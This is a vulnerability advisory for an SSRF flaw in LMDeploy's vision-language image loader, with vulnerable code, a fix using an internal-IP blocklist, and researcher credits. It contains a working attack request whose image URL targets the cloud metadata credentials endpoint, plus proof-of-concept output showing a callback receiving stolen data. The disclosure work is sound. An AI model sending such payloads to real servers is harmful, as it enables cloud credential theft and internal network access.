CVE-2026-33626
LMDeploy has Server-Side Request Forgery (SSRF) via Vision-Language Image Loading
Description
## Summary A Server-Side Request Forgery (SSRF) vulnerability exists in LMDeploy's vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources. ## Affected Versions - **Tested on:** main branch (2026-02-04) - **Affected:** All versions prior to 0.12.3 ## Vulnerable Code **File:** `lmdeploy/vl/utils.py` (lines 64-67) ```python def load_image(image_url: Union[str, Image.Image]) -> Image.Image: # ... if image_url.startswith('http'): response = requests.get(image_url, headers=headers, timeout=FETCH_TIMEOUT) # NO VALIDATION OF URL/IP BEFORE REQUEST ``` **Also affected:** `encode_image_base64()` function (lines 26-29) ## Root Cause 1. No validation of URLs before fetching 2. No blocklist for internal IPs (127.0.0.1, 169.254.x.x, 10.x.x.x, 192.168.x.x) 3. Server binds to `0.0.0.0` by default (api_server.py line 1393) 4. API keys disabled by default ## Attack Scenario 1. LMDeploy server deployed with vision-language model 2. Attacker sends request to `/v1/chat/completions` with malicious `image_url`: ```python POST /v1/chat/completions { "model": "internlm-xcomposer2", "messages": [{ "role": "user", "content": [ {"type": "text", "text": "Describe this image"}, {"type": "image_url", "image_url": {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}} ] }] } ``` 3. Server fetches URL without validation 4. Attacker receives cloud credentials ## Proof of Concept ### Verified Exploitation Result ``` ╔═══════════════════════════════════════════════════════════════════════╗ ║ LMDeploy SSRF Vulnerability - Proof of Concept ║ ╚═══════════════════════════════════════════════════════════════════════╝ [1] Starting callback server on port 8889... [2] Attacker URL: http://127.0.0.1:8889/SSRF_PROOF?stolen_data=AWS_SECRET_KEY [3] Calling vulnerable load_image() function... ====================================================================== [+] SSRF CALLBACK RECEIVED! ====================================================================== Time: 2026-02-04 16:10:57 Path: /SSRF_PROOF?stolen_data=AWS_SECRET_KEY Client: 127.0.0.1:51154 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)... ====================================================================== ✅ SSRF VULNERABILITY CONFIRMED! ``` ## Impact - **Cloud Credential Theft:** Access AWS/GCP/Azure metadata APIs - **Internal Service Access:** Reach services not exposed to internet - **Information Disclosure:** Port scan internal networks - **Lateral Movement:** Pivot point for further attacks ## Recommended Fix ```python from urllib.parse import urlparse import ipaddress import socket BLOCKED_NETWORKS = [ ipaddress.ip_network('127.0.0.0/8'), ipaddress.ip_network('10.0.0.0/8'), ipaddress.ip_network('172.16.0.0/12'), ipaddress.ip_network('192.168.0.0/16'), ipaddress.ip_network('169.254.0.0/16'), ] def is_safe_url(url: str) -> bool: try: parsed = urlparse(url) if parsed.scheme not in ('http', 'https'): return False ip = socket.gethostbyname(parsed.hostname) ip_addr = ipaddress.ip_address(ip) return not any(ip_addr in network for network in BLOCKED_NETWORKS) except: return False ``` --- ## Credit This vulnerability was discovered as part of Orca Security's research. **Researcher:** Igor Stepansky **Organization:** Orca Security **Emails:** igor.stepansky@orca.security iggy.p0pi@orca.security